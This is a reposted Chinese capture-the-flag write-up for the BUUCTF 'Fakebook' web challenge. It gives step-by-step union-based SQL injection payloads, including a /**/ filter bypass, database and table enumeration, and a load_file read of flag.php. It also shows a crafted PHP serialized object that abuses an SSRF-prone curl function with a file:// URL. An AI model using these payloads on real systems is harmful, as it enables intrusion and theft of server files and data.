BUU-WEB-[网鼎杯 2018]Fakebook

Posted TzZzEZ-web

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUU-WEB-[网鼎杯 2018]Fakebook相关的知识,希望对你有一定的参考价值。

在这里插入图片描述
通过dirsearch爆破出网站存在一个**/flag.php**网页,但是无法正常读取。
访问robots协议,发现有源码备份文件。

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\\:\\/\\/)?)([0-9a-zA-Z\\-]+\\.)+[a-zA-Z]{2,6}(\\:[0-9]+)?(\\/\\S*)?$/i", $blog);
    }

}

先进行页面功能分析。
常规注册并登录,发现登录后url存在注入点。
在这里插入图片描述

view.php?no=1 and 1=1
#成功运行
view.php?no=1 and 1=2
#成功运行,说明此处存在sql注入点。
view.php?no=1 order by 5
#4的时候不报错,5的时候报错,证明有4个字段
view.php?no=-1 union select 1,2,3,4
#no hack~应该是union被过滤了
view.php?no=-1 union/**/select 1,2,3,4
#成功有回显
view.php?no=-1 union/**/select 1,database(),3,4 
#成功爆出数据库的名称fakebook
view.php?no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables.where table_schema=database()
#成功爆出表名为users
view.php?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'
#成功爆出字段名:no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS
view.php?no=-1 union/**/select 1,group_concat(data),3,4 from users
#成功爆出注册时的序列化账户
#O:8:"UserInfo":3:{s:4:"name";s:6:"tzzzez";s:3:"age";i:20;s:4:"blog";s:11:"tzzzez.blog";}
view.php?no=-1 union/**/select 1,load_file('/var/www/html/flag.php'),3,4
#借助load_file函数读取flag.php网页内容

方法1:
(借助load_file函数读取结果)
(表格不够大,所以只能通过f12查看)
在这里插入图片描述
方法2:
借助ssrf,通过get函数读取/flag.php内容,由于被过滤,所以无法直接读取。因此借助file协议读取网页内容。读取的payload为:

file:///var/www/html/flag.php

(此时想通过注册时直接读取,但是被拒了)

函数中的user还有一层序列化,此时可以通过sql爆破出的user的序列化进行构建,也可以通过源码进行构造。

<?php
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";
}
$a = new UserInfo();
$a->name = 'tzzzez';
$a->age=20;
$a->blog='file:///var/www/html/flag.php';
echo serialize($a);
?>

在这里插入图片描述
最后通过sql注入,返回file读取的内容。

view.php?no=-1 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:6:"tzzzez";s:3:"age";i:20;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

(解释一下为什么file放在第四字段,因为第四字段对应的是blog内容,通过这个点才能读取内容)
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

以上是关于BUU-WEB-[网鼎杯 2018]Fakebook的主要内容,如果未能解决你的问题,请参考以下文章

BUU-WEB-[网鼎杯 2020 朱雀组]Nmap

BUU-WEB-[网鼎杯 2020 朱雀组]phpweb

[网鼎杯 2018]Comment

[网鼎杯 2018]Fakebook

网鼎杯2018fakebook

[网鼎杯2018]Unfinish